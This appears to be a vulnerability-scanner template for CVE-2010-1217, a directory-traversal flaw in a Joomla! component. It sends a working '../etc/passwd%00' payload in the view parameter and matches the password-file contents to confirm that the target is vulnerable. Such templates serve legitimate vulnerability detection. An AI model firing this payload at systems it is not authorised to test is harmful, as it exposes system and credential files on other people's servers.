id: CVE-2010-1217

info:
  name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
  reference:
    - https://www.exploit-db.com/exploits/11814
    - https://www.cvedetails.com/cve/CVE-2010-1217
  tags: cve,cve2010,joomla,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200